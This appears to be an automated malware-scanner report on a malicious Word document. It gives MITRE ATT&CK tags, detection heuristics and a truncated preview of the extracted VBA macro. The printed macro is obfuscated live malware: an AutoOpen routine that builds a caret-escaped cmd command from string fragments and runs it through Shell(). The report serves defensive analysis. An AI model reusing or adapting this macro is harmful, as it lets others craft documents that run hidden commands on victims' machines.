MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a Word document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute a command, which is a common technique for downloading and running additional malicious payloads. The obfuscated nature of the script and the use of the Shell() function indicate a high likelihood of malicious intent.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15620 bytes |
SHA-256: 9b360a7c1e1f302698ee71c3085da677760ce39e810c2328e52ebfc2015b129c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zijsDqwAp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function vodbvjXFk()
On Error Resume Next
For ZaocaM = BdcoRD To 58882
NAvHl = (ZrJmzq - ChrW(22059 * 33736) * ELJOJA * CInt(DWiJOz + Sqr(39815)) + 26650 - 73869 / 28081 - CDate(hazjr - 12378 + 89049 - Hex(iipcW / 70430)) + (kYdIoV * Tan(lzYYb)))
Next
For bWwAj = iqtUTC To 39022
RzOtM = (iNwkd - ChrW(50176 * 85302) * pCLTi * CInt(YLipt + Sqr(86769)) + 12344 - 86292 / 81292 - CDate(JGUME - 76249 + 66501 - Hex(LCqNaL / 43377)) + (kTArI * Tan(XvkGOZ)))
Next
vodbvjXFk = BiPVY + Shell(ITEMSzcn + Chr(nZwwXdd + vbKeyC + HKWsn) + iJiTpAHaWQE + DOzVE + FpJoIPziCB + BSJnSzXDsZD + nKCUiSI + FWZzVQc + ZmNSsQw, WNbnldXWrp + 0 + MTQJPwMqLHG)
For TSlXr = XFfGCT To 64042
ciKkX = (kInrw - ChrW(91347 * 19260) * ZbwYJd * CInt(kEqjkz + Sqr(6519)) + 8973 - 23901 / 97981 - CDate(bsvMZ - 40951 + 84220 - Hex(QLftY / 92783)) + (pjEId * Tan(DPsdU)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For mTjDa = aURnMC To 55796
CNjEKR = (UJWAEV - ChrW(25979 * 46404) * DiFTFm * CInt(HEAzcw + Sqr(3952)) + 38946 - 3232 / 60340 - CDate(HpjnTD - 28391 + 34682 - Hex(KDWXN / 92107)) + (jdzJbQ * Tan(ZAJTKV)))
Next
vodbvjXFk
For CwYZG = tQPCEn To 55875
Ehdkj = (SqEVU - ChrW(83073 * 20800) * mJjEw * CInt(HEwwH + Sqr(25487)) + 92891 - 37933 / 27949 - CDate(EnnFVT - 61873 + 67264 - Hex(MpMuCE / 28723)) + (jdGSA * Tan(bQAjfd)))
Next
End Sub
Attribute VB_Name = "NwbJRhEFo"
Function iJiTpAHaWQE()
On Error Resume Next
For AZfOp = mIsRu To 16861
aKFFSa = (NsTaC - ChrW(4366 * 88263) * WklwR * CInt(NMrcJ + Sqr(93582)) + 7480 - 97941 / 34567 - CDate(uAFUt - 71544 + 30966 - Hex(wPJHGF / 23335)) + (LRlHjz * Tan(qMzNcJ)))
Next
AbilpMD = "md" + " B" + "wnUcnO" + "qHfuJRc NYwEsDi" + "IhYhZQpj" + "hwwu pzOffdVq &" + " %^"
For UOaRjC = ZblUzz To 5191
GGmQWk = (NJVwJO - ChrW(14379 * 91358) * ncUuv * CInt(oYJqmq + Sqr(625)) + 75405 - 62488 / 173 - CDate(wGrbLm - 87371 + 67056 - Hex(Qwkth / 34662)) + (OjWdIz * Tan(RNGjw)))
Next
vZRhzskZijV = "c^o^m^S" + "^p^E" + "^c^" + "% %^c" + "^o^m^S^p"
For MWowUS = Dwcqb To 21713
QroQIU = (mGJWf - ChrW(93602 * 64462) * NEGvn * CInt(tIoYOR + Sqr(54250)) + 33875 - 8965 / 62909 - CDate(zFIZY - 80790 + 45499 - Hex(laQfZo / 42602)) + (diXkj * Tan(FWjAs)))
Next
NXfsXMpwv = "^E^c^% /V" + " " + " /c " + " s" + "et" + " %QZPIPTmDXVqWn"
For DhUBcV = qYzoOi To 32594
OddPj = (wwijwV - ChrW(48330 * 1373) * qYzdaD * CInt(OCEGf + Sqr(89305)) + 57828 - 88805 / 17525 - CDate(PWqtG - 72373 + 17578 - Hex(FjlUj / 98676)) + (qmJQR * Tan(pwIOa)))
Next
vPVhbBjaua = "Fw%=NIaSwNNU" + "iXYahY&&se" + "t %HDPwkdhN%=p" + "&&set " + "%sLZhFkwXn%="
For dNDUo = vGCJs To 69990
ocVTTu = (EwpHU - ChrW(56863 * 84587) * ZYiffa * CInt(nBPzwk + Sqr(86341)) + 13069 - 62354 / 89052 - CDate(icbUi - 78028 + 38289 - Hex(GjYvz / 21100)) + (whibNF * Tan(IpUEW)))
Next
XTrqaujm = "o^" + "w&&set" + " %NZISRwSR" + "qzCdJbF" + "%=VjBTSWDD" + "rD&&" + "set %" + "JkjODpIi%" + "=!%H"
For lLqINv = PVFuuL To 50661
zPFQm = (mLcFh - ChrW(38013 * 35287) * mzaSW * CInt(uqPiD + Sqr(22192)) + 32046 - 55958 / 53559 - CDate(hBirIa - 28641 + 77031 - Hex(jwANDj / 53924)) + (ujFUbo * Tan(aJzWM)))
Next
hLkkDwi = "DPwkd" + "hN%!&&set " + "%MuZruL" + "WzIR" + "OVozd%=RdPUDmP" + "LCoZNGq&&s" + "et %nwwzkno" + "u%=e^r&&s" + "et %Bnz" + "ARIZjdr%=!%sLZh"
iJiTpAHaWQE = AbilpMD + vZRhzskZijV + NXfsXMpwv + vPVhbBjaua + XTrqaujm + hLkkDwi
End Function
Function DOzVE()
On Error Resume Next
For AJjsYf = bMLkli To 80247
ucMCb = (WuWPFM - ChrW(46609 * 32719) * arbIjo * CInt(VfBnG + Sqr(66126)) + 44768 - 40168 / 65706 - CDate(zljhnU - 71149 + 93241 - Hex(PNcSSQ / 19375)) + (ksKZJ * Tan(iHhBoY)))
Next
OlmhmVztw = "FkwXn%!&" + "&s" + "et " + "%BJIfL
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.